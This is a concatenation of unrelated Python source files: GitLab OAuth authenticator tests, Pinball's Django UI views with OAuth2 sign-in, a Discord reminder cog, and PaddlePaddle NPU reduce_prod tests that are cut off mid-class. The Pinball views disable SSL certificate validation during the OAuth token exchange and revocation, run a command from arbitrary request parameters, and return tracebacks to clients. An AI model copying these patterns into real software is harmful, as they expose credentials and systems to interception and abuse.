        name = user_info['name']
        assert name == 'caboose'

        handler = client.handler_for_user(group_user_model('burns', is_admin=True))
        user_info = await authenticator.authenticate(handler)
        name = user_info['name']
        assert name == 'burns'

        handler = client.handler_for_user(group_user_model('grif'))
        name = await authenticator.authenticate(handler)
        assert name is None

        handler = client.handler_for_user(group_user_model('simmons', is_admin=True))
        name = await authenticator.authenticate(handler)
        assert name is None

        # reverse it, just to be safe
        authenticator.gitlab_group_whitelist = ['red']
        handler = client.handler_for_user(group_user_model('caboose'))
        name = await authenticator.authenticate(handler)
        assert name is None

        handler = client.handler_for_user(group_user_model('grif'))
        user_info = await authenticator.authenticate(handler)
        name = user_info['name']
        assert name == 'grif'

        client.hosts['gitlab.com'].pop()
async def test_project_id_whitelist(gitlab_client):
    """gitlab_project_id_whitelist: require >= Developer access to a project."""
    client = gitlab_client
    authenticator = GitLabOAuthenticator()
    mock_api_version(client, '12.4.0-pre')

    # project id -> {user id -> membership record}
    # NOTE(review): john's record carries 'id': 3588674 although his key is
    # '3588673' — looks like a copy-paste slip in the fixture; verify intent.
    user_projects = {
        '1231231': {
            '3588673': {
                'id': 3588674,
                'name': 'john',
                'username': 'john',
                'state': 'active',
                'avatar_url': 'https://secure.gravatar.com/avatar/382a6b306679b2d97b547bfff3d73242?s=80&d=identicon',
                'web_url': 'https://gitlab.com/john',
                'access_level': 10,  # Guest
                'expires_at': '2030-02-23'
            },
            '3588674': {
                'id': 3588674,
                'name': 'harry',
                'username': 'harry',
                'state': 'active',
                'avatar_url': 'https://secure.gravatar.com/avatar/382a6b306679b2d97b547bfff3d73242?s=80&d=identicon',
                'web_url': 'https://gitlab.com/harry',
                'access_level': 30,  # Developer
                'expires_at': '2030-02-23'
            }
        }
    }

    john_user_model = user_model('john', 3588673)
    harry_user_model = user_model('harry', 3588674)
    sheila_user_model = user_model('sheila', 3588675)

    member_regex = re.compile(API_ENDPOINT + r'/projects/(.*)/members/all/(.*)')

    def is_member(request):
        # Return the membership record if (project, uid) exists, else 404.
        urlinfo = urlparse(request.url)
        project_id, uid = member_regex.match(urlinfo.path).group(1, 2)
        if user_projects.get(project_id) and user_projects.get(project_id).get(uid):
            res = user_projects.get(project_id).get(uid)
            return HTTPResponse(request=request, code=200,
                                buffer=BytesIO(json.dumps(res).encode('utf8')),
                                headers={'Content-Type': 'application/json'},
                                )
        else:
            return HTTPResponse(request=request, code=404,
                                buffer=BytesIO(''.encode('utf8'))
                                )

    client.hosts['gitlab.com'].append(
        (member_regex, is_member)
    )

    authenticator.gitlab_project_id_whitelist = [1231231]

    # Forbidden since John has guest access
    handler = client.handler_for_user(john_user_model)
    user_info = await authenticator.authenticate(handler)
    assert user_info is None

    # Authenticated since Harry has developer access to the project
    handler = client.handler_for_user(harry_user_model)
    user_info = await authenticator.authenticate(handler)
    name = user_info['name']
    assert name == 'harry'

    # Forbidden since Sheila doesn't have access to the project
    handler = client.handler_for_user(sheila_user_model)
    user_info = await authenticator.authenticate(handler)
    assert user_info is None

    authenticator.gitlab_project_id_whitelist = [123123152543]
    # Forbidden since the project does not exist.
    handler = client.handler_for_user(harry_user_model)
    user_info = await authenticator.authenticate(handler)
    assert user_info is None

    authenticator.gitlab_project_id_whitelist = [123123152543, 1231231]
    # Authenticated since Harry has developer access to one of the project in the list
    handler = client.handler_for_user(harry_user_model)
    user_info = await authenticator.authenticate(handler)
    name = user_info['name']
    assert name == 'harry'
| |
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Web request handlers."""
import collections
import httplib2
import json
import socket
import traceback
import time
from django.contrib import messages
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.http import HttpResponseServerError
from django.shortcuts import render
from django.views.generic.base import TemplateView
from pinball.authentication import oauth2
from pinball.config.pinball_config import PinballConfig
from pinball.config.utils import get_log
from pinball.tools.workflow_util import run_command
from pinball.ui.cache_thread import get_workflows_json
from pinball.ui.data_builder import DataBuilder
from pinball.ui.utils import get_workflow_jobs_from_parser_by_web_viewer
from pinball.ui.workflow_graph import WorkflowGraph
from pinball.persistence.store import DbStore
from pinball.workflow.signaller import Signal
__author__ = 'Pawel Garbacki'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
LOG = get_log('pinball.ui.views')
# Custom message level
SIGNIN = 35
def _serialize(elements):
    """Render *elements* as a DataTables-style JSON payload.

    Each element must expose a ``format()`` method; the formatted rows
    are wrapped under the ``aaData`` key expected by the UI tables.
    """
    rows = [element.format() for element in elements]
    return json.dumps({'aaData': rows})
def workflows(_):
    """Return the cached list of all workflows as JSON; 500 on any failure."""
    try:
        workflows_json = get_workflows_json()
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(workflows_json, content_type='application/json')
def instances(request):
    """Return instances of the workflow named in GET['workflow'] as JSON."""
    try:
        workflow = request.GET['workflow']
        data_builder = DataBuilder(DbStore(), use_cache=True)
        instances_data = data_builder.get_instances(workflow)
        instances_json = _serialize(instances_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(instances_json, content_type='application/json')
def jobs(request):
    """Return jobs of a workflow instance as JSON.

    GET['instance'] may be 'latest' to resolve the most recent instance.
    """
    try:
        data_builder = DataBuilder(DbStore(), use_cache=True)
        workflow = request.GET['workflow']
        instance = request.GET['instance']
        if instance == 'latest':
            instance = data_builder.get_latest_instance(workflow).instance
        jobs_data = data_builder.get_jobs(workflow, instance)
        jobs_json = _serialize(jobs_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(jobs_json, content_type='application/json')
def graph(request):
    """Render a workflow's job graph as SVG.

    With GET['instance'] (possibly 'latest'), draw the stored instance;
    otherwise build the graph from the workflow's parsed config.
    """
    try:
        data_builder = DataBuilder(DbStore(), use_cache=True)
        workflow = request.GET['workflow']
        if 'instance' in request.GET:
            instance = request.GET['instance']
            if instance == 'latest':
                instance = data_builder.get_latest_instance(workflow).instance
            jobs_data = data_builder.get_jobs(workflow=workflow,
                                              instance=instance)
            instance_data = data_builder.get_instance(workflow=workflow,
                                                      instance=instance)
            workflow_graph = WorkflowGraph(jobs_data, instance_data)
        else:
            workflow_graph = WorkflowGraph.from_parser(workflow)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(workflow_graph.get_svg(), content_type='image/svg+xml')
def executions(request):
    """Return a job's executions as JSON.

    When GET['instance'] is absent, aggregate executions across all
    instances of the workflow.
    """
    try:
        workflow = request.GET['workflow']
        instance = request.GET.get('instance')
        job = request.GET['job']
        data_builder = DataBuilder(DbStore())
        if instance:
            executions_data = data_builder.get_executions(workflow,
                                                          instance,
                                                          job)
        else:
            executions_data = data_builder.get_executions_across_instances(
                workflow, job)
        executions_json = _serialize(executions_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(executions_json, content_type='application/json')
class ExecutionView(TemplateView):
    """Detail page for a single job execution."""
    template_name = 'execution.html'

    def get_context_data(self, **kwargs):
        """Populate the template context from the stored execution record."""
        context = super(ExecutionView, self).get_context_data(**kwargs)
        workflow = self.request.GET['workflow']
        instance = self.request.GET['instance']
        job = self.request.GET['job']
        execution = int(self.request.GET['execution'])
        data_builder = DataBuilder(DbStore())
        execution_data = data_builder.get_execution(workflow,
                                                    instance,
                                                    job,
                                                    execution)
        formatted_data = execution_data.format()
        for key, value in formatted_data.items():
            context[key] = value
        properties = []
        for key, value in execution_data.properties.items():
            properties.append('%s=%s' % (key, value))
        context['properties'] = ', '.join(properties)
        # Blank out optional fields so the template shows nothing rather
        # than a bogus value for still-running executions.
        if not execution_data.end_time:
            context['end_time'] = ''
        if execution_data.exit_code is None:
            context['exit_code'] = ''
        return context
def file_content(request):
    """Serve the content of a job execution's log file as plain text.

    Expects GET params: workflow, instance, job, execution (non-negative
    int), log_type. Returns 500 with a traceback on any failure.
    """
    try:
        workflow = request.GET['workflow']
        instance = request.GET['instance']
        job = request.GET['job']
        execution = int(request.GET['execution'])
        log_type = request.GET['log_type']
        if execution < 0:
            # BUG FIX: the original concatenated a str with the int
            # `execution`, raising TypeError which the bare except turned
            # into a traceback response instead of this message.
            return HttpResponseServerError(
                'execution must not be negative; got %d' % execution)
        data_builder = DataBuilder(DbStore())
        file_data = data_builder.get_file_content(workflow, instance, job,
                                                  execution, log_type)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(file_data, content_type='text/plain')
def schedules(_):
    """Return all workflow schedules as JSON; 500 on any failure."""
    try:
        data_builder = DataBuilder(DbStore())
        schedules_data = data_builder.get_schedules()
        schedules_json = _serialize(schedules_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(schedules_json, content_type='application/json')
class ScheduleView(TemplateView):
    """Detail page for a single workflow schedule."""
    template_name = 'schedule.html'

    def get_context_data(self, **kwargs):
        """Populate the template context from the workflow's schedule record."""
        context = super(ScheduleView, self).get_context_data(**kwargs)
        workflow = self.request.GET['workflow']
        data_builder = DataBuilder(DbStore())
        schedule_data = data_builder.get_schedule(workflow)
        formatted_schedule = schedule_data.format()
        for key, value in formatted_schedule.items():
            context[key] = value
        context['emails'] = ' '.join(schedule_data.emails)
        return context
def jobs_from_config(request):
    """Return a workflow's jobs as parsed from its config (not the store)."""
    try:
        workflow = request.GET['workflow']
        jobs_data = get_workflow_jobs_from_parser_by_web_viewer(workflow)
        jobs_json = _serialize(jobs_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(jobs_json, content_type='application/json')
def command(request):
    """Run a workflow_util command assembled from the GET parameters.

    Every GET param becomes an option; 'force' is always set and
    'workflow'/'instance' default to None when absent.
    """
    try:
        args = {}
        for key in request.GET:
            args[key] = request.GET[key]
        args['force'] = True
        if 'workflow' not in args:
            args['workflow'] = None
        if 'instance' not in args:
            args['instance'] = None
        # run_command expects an argparse-like options object; a namedtuple
        # over the collected keys provides attribute access.
        Options = collections.namedtuple('Options', args.keys())
        options = Options(**args)
        output = run_command(options)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(json.dumps(output), content_type='application/json')
class TokenPathsView(TemplateView):
    """Directory-style browser page for token paths."""
    template_name = 'token_paths.html'

    def get_context_data(self, **kwargs):
        """Split GET['path'] into basename and (name, prefix) parent crumbs."""
        context = super(TokenPathsView, self).get_context_data(**kwargs)
        path = self.request.GET['path']
        if not path or not path.startswith('/'):
            # Malformed path: render with an empty context.
            return context
        path_elements = path.split('/')[1:]
        if path.endswith('/'):
            # Trailing slash produces an empty final element; drop it.
            path_elements.pop()
        if not path_elements:
            context['basename'] = ''
        else:
            context['basename'] = path_elements[-1]
        # A list of tuples (parent_name, parent_prefix).
        parents = []
        prefix = '/'
        for element in path_elements[:-1]:
            prefix += '%s/' % element
            parents.append((element, prefix))
        context['parents'] = parents
        return context
def token_paths(request):
    """Return token paths under GET['path'] as JSON; 500 on any failure."""
    try:
        path = request.GET['path']
        data_builder = DataBuilder(DbStore())
        tokens_data = data_builder.get_token_paths(path)
        tokens_json = _serialize(tokens_data)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(tokens_json, content_type='application/json')
class TokenView(TokenPathsView):
    """Detail page for a single token; reuses the parent's path breadcrumbs."""
    template_name = 'token.html'

    def get_context_data(self, **kwargs):
        """Merge the formatted token record into the breadcrumb context."""
        context = super(TokenView, self).get_context_data(**kwargs)
        token_name = self.request.GET['path']
        data_builder = DataBuilder(DbStore())
        token_data = data_builder.get_token(token_name)
        token_format = token_data.format()
        for key, value in token_format.items():
            context[key] = value
        return context
def _is_master_alive():
    """Return True if a TCP connection to the master can be established.

    Any connection failure (refused, timeout, DNS error) yields False.
    """
    try:
        # create_connection cleans up after itself on failure, so the
        # socket is never leaked (the original could leak the fd if
        # connect() raised before close() ran).
        s = socket.create_connection((PinballConfig.MASTER_HOST,
                                      PinballConfig.MASTER_PORT))
        s.close()
    except socket.error:
        # Narrowed from a bare except: only network errors mean "dead";
        # a bare except would also swallow KeyboardInterrupt/SystemExit.
        return False
    return True
def status(request):
    """Return a JSON list of system status flags.

    Includes at most one of 'exiting'/'aborting'/'draining' (signal
    precedence in that order) plus a note if the master is unreachable.
    """
    try:
        workflow = request.GET.get('workflow')
        instance = request.GET.get('instance')
        data_builder = DataBuilder(DbStore())
        status = []
        if data_builder.is_signal_set(workflow, instance, Signal.EXIT):
            status = ['exiting']
        elif data_builder.is_signal_set(workflow, instance, Signal.ABORT):
            status = ['aborting']
        elif data_builder.is_signal_set(workflow, instance, Signal.DRAIN):
            status = ['draining']
        if not _is_master_alive():
            status.append('no master at %s:%d' % (PinballConfig.MASTER_HOST,
                                                  PinballConfig.MASTER_PORT))
        status_json = json.dumps(status)
    except:
        LOG.exception('')
        return HttpResponseServerError(traceback.format_exc())
    else:
        return HttpResponse(status_json, content_type='application/json')
def signin(request):
    """Render the sign-in page or start the OAuth2 flow for a chosen domain.

    POSTing an authorized domain redirects to the provider's consent URL;
    an unauthorized domain re-renders the page with an error message.
    """
    oauth2_flow = oauth2.OAuth2Flow()
    context = {'domains': oauth2_flow.get_domains(), 'STATIC_URL': PinballConfig.STATIC_URL}
    if request.method == 'POST' and 'signin-domain' in request.POST.keys():
        domain = request.POST.get('signin-domain')
        if not oauth2_flow.domain_authenticated(domain):
            messages.add_message(request, SIGNIN, 'Domain not authorized: %s.' % domain,
                                 fail_silently=True)
            return render(request, 'signin.html', context,
                          content_type='text/html')
        else:
            flow = oauth2_flow.get_flow(domain)
            auth_uri = flow.step1_get_authorize_url()
            return HttpResponseRedirect(auth_uri)
    else:
        return render(request, 'signin.html', context,
                      content_type='text/html')
def auth_return(request):
    """OAuth2 redirect endpoint: exchange the auth code for credentials.

    On a verified email within an authorized domain, set the login cookies
    and redirect home; otherwise record a failure message and redirect to
    /logout/.
    """
    oauth2_flow = oauth2.OAuth2Flow()
    domains = oauth2_flow.get_domains()
    flow = oauth2.OAuth2Flow().get_flow(domains[1])
    # disable SSL certificate validation for exchanging access code
    http = httplib2.Http()
    http.disable_ssl_certificate_validation = True
    credential = flow.step2_exchange(request.GET.get('code'), http)
    credential_token = json.loads(credential.to_json())['id_token']
    if credential_token['email_verified'] and credential_token['hd'] in domains:
        email = credential_token['email']
        crypter = oauth2.Crypter()
        encrypted_email = crypter.encrypt(email)
        encrypted_domain = crypter.encrypt(credential_token['hd'])
        encrypted_token = crypter.encrypt(credential.access_token)
        response = HttpResponseRedirect('/')
        # cookie expires after a week
        response.set_cookie('login', encrypted_email, max_age=7 * 24 * 60 * 60)
        response.set_cookie('domain_url', encrypted_domain, max_age=7 * 24 * 60 * 60)
        response.set_cookie('user_id', email, max_age=7 * 24 * 60 * 60)
        response.set_cookie('token', encrypted_token)
        return response
    else:
        messages.add_message(request, SIGNIN, 'Authentication failed.')
        # BUG FIX: the redirect was constructed but never returned, so the
        # view fell off the end and returned None (a server error in Django).
        return HttpResponseRedirect('/logout/')
def logout(request):
    """Revoke the Google OAuth token (if any) and clear the login cookies."""
    credential_token = request.COOKIES.get('token', '')
    if credential_token == '':
        # No token cookie: already logged out.
        messages.add_message(request, SIGNIN, 'Logged out successfully.',
                             fail_silently=True)
        return HttpResponseRedirect('/signin/')
    crypter = oauth2.Crypter()
    try:
        logout_uri = 'https://accounts.google.com/o/oauth2/revoke?token=%s' \
            % crypter.decrypt(credential_token)
    except oauth2.CryptoException:
        # Undecryptable cookie: fall through to cookie cleanup below.
        response = HttpResponseRedirect('/signin/')
    else:
        http = httplib2.Http()
        http.disable_ssl_certificate_validation = True
        resp = http.request(logout_uri, 'GET')
        response = HttpResponseRedirect('/signin/')
        # Need to wait for Google to process the revoke request
        if resp[0].status == 200:
            time.sleep(2)
            # Redirect back to /logout/: with cookies cleared below, the
            # next pass takes the "already logged out" branch above.
            response = HttpResponseRedirect('/logout/')
    response.set_cookie('user_id', '')
    response.set_cookie('login', '')
    response.set_cookie('domain_url', '')
    response.set_cookie('token', '')
    return response
| |
import asyncio
from datetime import datetime, timedelta
from typing import Any, Iterable, Optional, Union
import discord
from asyncqlio.db import DatabaseInterface
from dateutil import rrule
from discord import AllowedMentions, Embed, TextChannel
from discord.ext import commands, menus
from discord.ext.commands import Cog
from discord.ext.menus import MenuKeysetPages, PageDirection, PageSpecifier
from recurrent.event_parser import RecurringEvent
from bot import BeattieBot
from context import BContext
from schema.remind import Recurring, Reminder, Table
from utils.checks import is_owner_or
from utils.converters import Time
from utils.etc import display_timedelta, reverse_insort_by_key
MINIMUM_RECURRING_DELTA = timedelta(minutes=10)
class ReminderSource(menus.KeysetPageSource):
    """Keyset-paginated menu source over one user's reminders in one guild."""

    def __init__(self, db: DatabaseInterface, user_id: int, guild_id: int):
        self.db = db
        self.user_id = user_id
        self.guild_id = guild_id

    def is_paginating(self) -> bool:
        return True

    async def get_page(self, specifier: PageSpecifier) -> list[Reminder]:
        """Fetch up to 10 reminders relative to the keyset reference.

        Raises ValueError on an empty page (the menus-library convention
        for "nothing to show").
        """
        async with self.db.get_session() as s:
            query = (
                s.select(Reminder)
                .where(
                    (Reminder.user_id == self.user_id)
                    & (Reminder.guild_id == self.guild_id)
                )
                .limit(10)
            )
            if specifier.reference is not None:
                # Seek past the edge of the previously shown page.
                if specifier.direction is PageDirection.after:
                    query = query.where(Reminder.id > specifier.reference[-1]["id"])
                else:
                    query = query.where(Reminder.id < specifier.reference[0]["id"])
            sort_order = "asc" if specifier.direction is PageDirection.after else "desc"
            query = query.order_by(Reminder.id, sort_order=sort_order)
            results = [reminder async for reminder in await query.all()]
        if not results:
            raise ValueError
        if specifier.direction is PageDirection.before:
            # Backward pages come out reversed; restore ascending order.
            results.reverse()
        return results

    async def format_page(self, _: Any, page: Iterable[Reminder]) -> Embed:
        """Render a page of reminders as a single embed."""
        return Embed(
            description="\n".join(
                f'ID {row.id}: "{row.topic}" at {row.time}' for row in page
            )
        )
class Remind(Cog):
    """Schedule, persist, and deliver one-shot and recurring reminders.

    The in-memory queue is kept sorted by time in *descending* order, so
    the soonest reminder sits at the end (``queue[-1]``) and is popped
    cheaply by the sleeper task.
    """

    def __init__(self, bot: BeattieBot):
        self.queue: list[Reminder] = []
        self.loop = bot.loop
        self.db = bot.db
        self.bot = bot
        self.db.bind_tables(Table)
        # Dummy completed task so self.timer is always a cancellable Task.
        self.timer: asyncio.Task = self.loop.create_task(asyncio.sleep(0))
        self.loop.create_task(self.__init())

    def cog_check(self, ctx: BContext) -> bool:
        # Reminders are guild-scoped; refuse DMs.
        return ctx.guild is not None

    def cog_unload(self) -> None:
        self.timer.cancel()

    async def __init(self) -> None:
        """Create tables if needed, load persisted reminders, start the timer."""
        await self.bot.wait_until_ready()
        for table in [Reminder, Recurring]:
            await table.create(if_not_exists=True)  # type: ignore
        async with self.db.get_session() as s:
            # Descending time order matches the queue's invariant.
            query = s.select(Reminder).order_by(Reminder.time, sort_order="desc")
            self.queue = [reminder async for reminder in await query.all()]
        await self.start_timer()

    @commands.group(invoke_without_command=True, usage="")
    async def remind(
        self,
        ctx: BContext,
        time: Time,
        *,
        topic: str = None,
    ) -> None:
        """Commands for setting and managing reminders."""
        await self.set_reminder(ctx, time, topic=topic)

    @remind.error
    async def remind_error(self, ctx: BContext, e: Exception) -> None:
        # Only delegate when the bare group (not a subcommand) failed.
        if ctx.invoked_subcommand is None:
            await self.set_reminder_error(ctx, e)

    @remind.command(name="set", aliases=["me"])
    async def set_reminder(
        self,
        ctx: BContext,
        time: Time,
        *,
        topic: str = None,
    ) -> None:
        """Have the bot remind you about something.
        First put time (in quotes if there are spaces), then topic"""
        time: Union[RecurringEvent, datetime] = time
        if topic is None and isinstance(time, RecurringEvent):
            await ctx.send("You must supply a message for a recurring reminder.")
            return
        if await self.process_reminder(ctx, time, topic):
            await ctx.send("Okay, I'll remind you.")

    @set_reminder.error
    async def set_reminder_error(self, ctx: BContext, e: Exception) -> None:
        if isinstance(e, (commands.BadArgument, commands.ConversionError)):
            await ctx.send(
                "Bad input. Valid input examples:\n"
                "remind 10m pizza\n"
                'remind "every week" call your mom'
            )
        else:
            await ctx.bot.handle_error(ctx, e)

    @remind.command(name="list")
    async def list_reminders(self, ctx: BContext) -> None:
        """List all reminders active for you in this server."""
        assert ctx.guild is not None
        pages = MenuKeysetPages(
            source=ReminderSource(ctx.bot.db, ctx.author.id, ctx.guild.id),
            clear_reactions_after=True,
        )
        try:
            await pages.start(ctx)
        except ValueError:
            # ReminderSource raises ValueError for an empty page.
            await ctx.send("No reminders to show.")

    @remind.command(name="delete", aliases=["remove", "del", "cancel"])
    async def delete_reminder(self, ctx: BContext, reminder_id: int) -> None:
        """Delete a specific reminder. Use `list` to get IDs."""
        async with ctx.bot.db.get_session() as s:
            query = s.select(Reminder).where(Reminder.id == reminder_id)
            reminder = await query.first()
            if reminder is None:
                await ctx.send("No such reminder.")
                return
            if reminder.user_id != ctx.author.id:
                await ctx.send("That reminder belongs to someone else.")
                return
            await s.remove(reminder)
            await s.delete(Recurring).where(Recurring.id == reminder_id)
        if self.queue[-1] == reminder:
            # Deleting the soonest reminder: restart the sleeper.
            self.timer.cancel()
            self.queue.pop()
            await self.start_timer()
        else:
            self.queue.remove(reminder)
        await ctx.send("Reminder deleted.")

    @remind.command(name="channel")
    @is_owner_or(manage_guild=True)
    async def set_channel(self, ctx: BContext, channel: TextChannel = None) -> None:
        """Set the channel reminders will appear in. Invoke with no input to reset."""
        assert ctx.guild is not None
        await ctx.bot.config.set_guild(
            ctx.guild.id, reminder_channel=channel and channel.id
        )
        if channel is None:
            destination = "the channel they were invoked in"
        else:
            destination = channel.mention
        await ctx.send(f"All reminders will be sent to {destination} from now on.")

    async def process_reminder(
        self,
        ctx: BContext,
        argument: Union[RecurringEvent, datetime],
        topic: Optional[str],
    ) -> bool:
        """Persist and schedule a reminder; return True on success."""
        assert ctx.guild is not None
        if isinstance(argument, RecurringEvent):
            rr = rrule.rrulestr(argument.get_RFC_rrule())
            time = rr.after(datetime.now())
            # Reject schedules that fire more often than the allowed minimum.
            next_ = rr.after(time)
            if next_ - time < MINIMUM_RECURRING_DELTA:
                await ctx.send(
                    "Recurring period too short. Minimum period is:\n"
                    f"{display_timedelta(MINIMUM_RECURRING_DELTA)}"
                )
                return False
        else:
            time = argument
        async with self.db.get_session() as s:
            reminder = await s.add(
                Reminder(
                    guild_id=ctx.guild.id,
                    channel_id=ctx.channel.id,
                    message_id=ctx.message.id,
                    user_id=ctx.author.id,
                    time=time,
                    topic=topic,
                )
            )
            if isinstance(argument, RecurringEvent):
                await s.add(Recurring(id=reminder.id, rrule=argument.get_RFC_rrule()))
        await self.schedule_reminder(reminder)
        return True

    async def schedule_reminder(self, reminder: Reminder) -> None:
        """Insert a reminder into the queue, restarting the timer if soonest."""
        if not self.queue or reminder.time < self.queue[-1].time:
            self.queue.append(reminder)
            self.timer.cancel()
            await self.start_timer()
        else:
            # Keep descending order; hi excludes the (sooner) tail element.
            reverse_insort_by_key(
                self.queue, reminder, key=lambda r: r.time, hi=len(self.queue) - 1
            )

    async def send_reminder(self, reminder: Reminder) -> None:
        """Deliver a due reminder, then reschedule (recurring) or delete it."""
        found = False
        is_recurring = False
        # Resolve guild -> member -> destination channel; the configured
        # guild-wide reminder channel takes priority over the origin channel.
        if (
            (guild := self.bot.get_guild(reminder.guild_id))
            and (member := guild.get_member(reminder.user_id))
            and (
                channel := guild.get_channel(
                    (
                        reminder_channel_id := (
                            await self.bot.config.get_guild(guild.id)
                        ).get("reminder_channel")
                    )
                    or reminder.channel_id
                )
            )
        ):
            found = True
            assert isinstance(channel, TextChannel)
            async with self.db.get_session() as s:
                query = s.select(Recurring).where(Recurring.id == reminder.id)
                recurring = await query.first()
            is_recurring = recurring is not None
            reference = None
            if is_recurring:
                message = reminder.topic
            else:
                topic = reminder.topic or "something"
                message = f"You asked to be reminded about {topic}."
                if (
                    reminder_channel_id is None
                    or reminder_channel_id == reminder.channel_id
                ):
                    # Reply to the original message if it still exists.
                    try:
                        await channel.fetch_message(reminder.message_id)
                    except (discord.NotFound, discord.Forbidden):
                        pass
                    else:
                        reference = discord.MessageReference(
                            message_id=reminder.message_id,
                            channel_id=reminder.channel_id,
                            guild_id=reminder.guild_id,
                        )
            if reference is None:
                # No reply target: mention the user explicitly instead.
                message = f"{member.mention}\n{message}"
            if member.permissions_in(channel).mention_everyone:
                allowed_mentions = AllowedMentions.all()
            else:
                allowed_mentions = AllowedMentions(
                    everyone=False, users=[member], roles=False
                )
            try:
                await channel.send(
                    message,
                    allowed_mentions=allowed_mentions,
                    reference=reference,
                )
            except discord.Forbidden:
                pass
            except Exception as e:
                message = (
                    "An error occured in sending a reminder to "
                    f"{channel.guild.name}#{channel.name}"
                )
                self.bot.logger.exception(
                    message, exc_info=(type(e), e, e.__traceback__)
                )
            if is_recurring:
                # Advance the recurring reminder to its next occurrence.
                rr = rrule.rrulestr(recurring.rrule)
                time = rr.after(reminder.time)
                async with self.db.get_session() as s:
                    await s.update(Reminder).set(Reminder.time, time).where(
                        Reminder.id == reminder.id
                    )
                reminder.time = time
                await self.schedule_reminder(reminder)
        if not is_recurring:
            # One-shot (or undeliverable) reminder: remove it from storage.
            async with self.db.get_session() as s:
                await s.remove(reminder)
                if not found:
                    await s.delete(Recurring).where(Recurring.id == reminder.id)

    async def start_timer(self) -> None:
        self.timer = self.loop.create_task(self.sleep())

    async def sleep(self) -> None:
        """Sleep until the soonest reminder is due, then deliver it."""
        while self.queue:
            delta = (self.queue[-1].time - datetime.now()).total_seconds()
            if delta <= 0:
                await self.send_reminder(self.queue.pop())
            else:
                # Cap the sleep so very distant reminders don't overflow.
                await asyncio.sleep(min(delta, 3_000_000))
def setup(bot: BeattieBot) -> None:
    """discord.py extension entry point: attach the Remind cog."""
    bot.add_cog(Remind(bot))
| |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci
import paddle
import paddle.fluid.core as core
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard
from paddle.fluid.framework import convert_np_dtype_to_dtype_
paddle.enable_static()
class TestNPUReduceProd(OpTest):
    """Base NPU reduce_prod test: product over axis 0 of a (5, 6, 10) input."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'dim': [0]}
        self.outputs = {
            'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
        }

    def test_check_output(self):
        self.check_output_with_place(self.place)

    def set_npu(self):
        # Flag the whole test class as NPU-targeted and pin the device.
        self.__class__.use_npu = True
        self.place = paddle.NPUPlace(0)

    def init_dtype(self):
        self.dtype = np.float32
class TestNPUReduceProd2(TestNPUReduceProd):
    """reduce_prod with an empty attrs dict: op defaults to dim=[0]."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {}  # default 'dim': [0]
        self.outputs = {'Out': self.inputs['X'].prod(axis=tuple([0]))}
class TestNPUReduceProd3(TestNPUReduceProd):
    """reduce_prod with attrs left entirely unset (inherits base attrs)."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        # self.attrs = {'dim': [0]}
        self.outputs = {'Out': self.inputs['X'].prod(axis=tuple([0]))}
class TestNPUReduceProd6D(TestNPUReduceProd):
    """reduce_prod over middle axes of a 6-D input."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {
            'X': np.random.random((5, 6, 2, 3, 4, 2)).astype(self.dtype)
        }
        self.attrs = {'dim': [2, 3, 4]}
        self.outputs = {
            'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
        }
class TestNPUReduceProd8D(TestNPUReduceProd):
    """reduce_prod over middle axes of an 8-D input."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {
            'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype(self.dtype)
        }
        self.attrs = {'dim': [2, 3, 4]}
        self.outputs = {
            'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
        }
class TestReduceAll(TestNPUReduceProd):
    """reduce_prod with reduce_all=True: product over every element."""

    def setUp(self):
        self.op_type = "reduce_prod"
        self.set_npu()
        self.init_dtype()
        self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
        self.attrs = {'reduce_all': True}
